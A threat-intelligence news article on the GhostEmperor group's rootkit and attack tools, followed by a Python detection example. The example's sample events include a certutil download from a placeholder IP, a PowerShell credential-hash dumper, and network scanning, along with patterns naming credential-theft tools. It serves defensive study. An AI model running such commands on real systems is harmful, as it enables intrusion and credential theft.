GhostEmperor is exploiting Exchange vulnerabilities in Southeast Asia


Kaspersky has issued a thorough analysis outlining the latest activities associated with GhostEmperor. The threat actor was recently identified as employing a new rootkit and attacking Exchange vulnerabilities. It has mostly targeted Southeast Asian governments and telecom companies.

GhostEmperor now employs a previously unknown Windows kernel-mode rootkit known as Demodex, together with a complex multi-stage malware framework used for remote control of targeted systems. The group has been observed primarily targeting telecommunications companies and government agencies in Southeast Asia, as well as in Afghanistan, Ethiopia, and Egypt. Most infections originated from public-facing servers (Apache servers, IIS servers on Windows, and Oracle servers); the attackers are thought to have exploited vulnerabilities in the web applications hosted on them.

After obtaining access to the targeted computers, the attackers used a combination of bespoke and open-source offensive toolkits to collect user credentials and move on to other systems on the network. The group bypasses Windows Driver Signature Enforcement with an undocumented loading technique that makes use of the kernel-mode component of Cheat Engine, an open-source project. GhostEmperor has applied obfuscation and anti-analysis techniques to make the malware difficult for analysts to investigate.

Standard utilities from the Sysinternals suite for managing processes (PsExec, ProcDump, and PsList) are used, as are BITSAdmin, CertUtil, and WinRAR. The attackers also used open-source tools such as Get-PassHashes[.]ps1, Token[.]exe, Ladon, and mimikat_ssp, and relied on Powercat and NBTscan for internal network reconnaissance and communication.
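Because almost every tool in that list is dual-use, a host-based detection should correlate several stages of the chain rather than alert on one binary. The following is an added example (not code from the article or from Kaspersky's report) that classifies constructed Sysmon-style process-creation events into the purposes described above and flags a host only when more than one stage appears; the host names, parent/child pairs and IP address are placeholders built for the example.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events for this example (not data from the
# Kaspersky report); host names and the IP address are placeholders.
EVENTS = [
    {"host": "EXCH01", "parent": "w3wp.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "EXCH01", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://198.51.100.7/a.txt a.txt"},
    {"host": "EXCH01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -ep bypass .\\Get-PassHashes.ps1"},
    {"host": "EXCH01", "parent": "cmd.exe", "image": "nbtscan.exe", "cmdline": "nbtscan.exe 10.0.0.0/24"},
    {"host": "FS02", "parent": "explorer.exe", "image": "procdump.exe",
     "cmdline": "procdump.exe -ma notepad.exe"},  # routine admin use: not lsass, no other stage
]

# Command-line patterns grouped by purpose; the tool names are the ones listed in the article.
CATEGORIES = {
    "ingress_tool": [r"\bcertutil(\.exe)?\b.*-urlcache", r"\bbitsadmin(\.exe)?\b.*/transfer"],
    "credential_access": [r"get-passhashes\.ps1", r"\bprocdump(\.exe)?\b.*\blsass\b",
                          r"mimikat", r"\btoken\.exe\b"],
    "lateral_movement": [r"\bpsexec(\.exe)?\b", r"\bladon(\.exe)?\b"],
    "network_recon": [r"\bnbtscan(\.exe)?\b", r"powercat"],
}
WEB_SERVERS = {"w3wp.exe", "httpd.exe"}  # IIS and Apache worker processes
SHELLS = {"cmd.exe", "powershell.exe"}


def classify(event):
    """Return the set of categories one process-creation event matches."""
    hits = {c for c, pats in CATEGORIES.items()
            if any(re.search(p, event["cmdline"], re.IGNORECASE) for p in pats)}
    # A web-server worker spawning a shell is the usual first sign of a web-app exploit.
    if event["parent"].lower() in WEB_SERVERS and event["image"].lower() in SHELLS:
        hits.add("web_server_shell")
    return hits


def categories_by_host(events):
    """Accumulate the distinct categories seen per host across all its events."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]] |= classify(ev)
    return dict(seen)


def flag_hosts(events, min_categories=2):
    """Flag hosts showing several stages; a single dual-use tool alone is not enough."""
    return sorted(h for h, c in categories_by_host(events).items() if len(c) >= min_categories)
```

Run against the constructed events, only EXCH01 is flagged: the ProcDump run on FS02 matches no stage because it does not touch lsass and nothing else on that host does.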

The use of anti-forensic techniques and such a wide range of toolkits indicates that the GhostEmperor group has access to sophisticated infrastructure and knows how to operate it. To defend against it, organisations should build a multi-layered security architecture that includes effective anti-malware, firewalls, Host-based Intrusion Detection Systems (HIDS), and Intrusion Prevention Systems (IPS).